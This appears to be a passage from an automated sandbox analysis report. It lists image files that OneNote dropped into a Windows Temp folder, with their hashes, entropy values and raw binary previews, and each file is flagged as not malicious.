                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{7E485254-4D46-4F3F-A962-256E218A6653}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4410
                                                                                                  Entropy (8bit):7.857636973514526
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                  MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                  SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                  SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                  SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.

                                                                                                  C:\Users\user\AppData\Local\Temp\{7E5AFB83-1C5B-4F92-B2FA-0AE37869D629}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5136
                                                                                                  Entropy (8bit):7.622045262603241
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                  MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                  SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                  SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                  SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\{7F114890-E51B-4444-BBFC-686ACC595FE4}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Temp\{7FC54303-89CA-4E6D-B4CE-9D4A5228EAC9}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):39010
                                                                                                  Entropy (8bit):7.362726513389497
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                  MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                  SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                  SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                  SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                  C:\Users\user\AppData\Local\Temp\{80BD033C-9EBC-4BB3-90CE-6FC272032896}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Temp\{8125F1DB-E94C-4878-87E7-E5EF8D3F400F}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):59832
                                                                                                  Entropy (8bit):7.308211468398169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                  MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                  SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                  SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                  SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                  C:\Users\user\AppData\Local\Temp\{821A88CC-6BB5-4F12-A3EC-AF43A431C53A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2266
                                                                                                  Entropy (8bit):5.563021222358941
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                  MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                  SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                  SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                  SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G

                                                                                                  C:\Users\user\AppData\Local\Temp\{830E3F2E-BDAD-44EA-9E9C-38B859154A11}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1569
                                                                                                  Entropy (8bit):7.583832946136897
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                  MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                  SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                  SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                  SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

                                                                                                  C:\Users\user\AppData\Local\Temp\{8334E65F-F424-4F5F-A325-6221945B7679}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Temp\{8755A164-2B5E-4855-9B9D-4AD1A196B407}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{8815919C-8D64-4C70-9AD3-671319F49876}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{8887A304-FE7C-4B9D-B6AC-07BCD297D094}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{88A3BAE5-6055-4F2F-92CC-1FA8CB7A30F6}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Temp\{88E4EBE1-E4F0-4AB9-AAE7-FE59A17D02E2}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
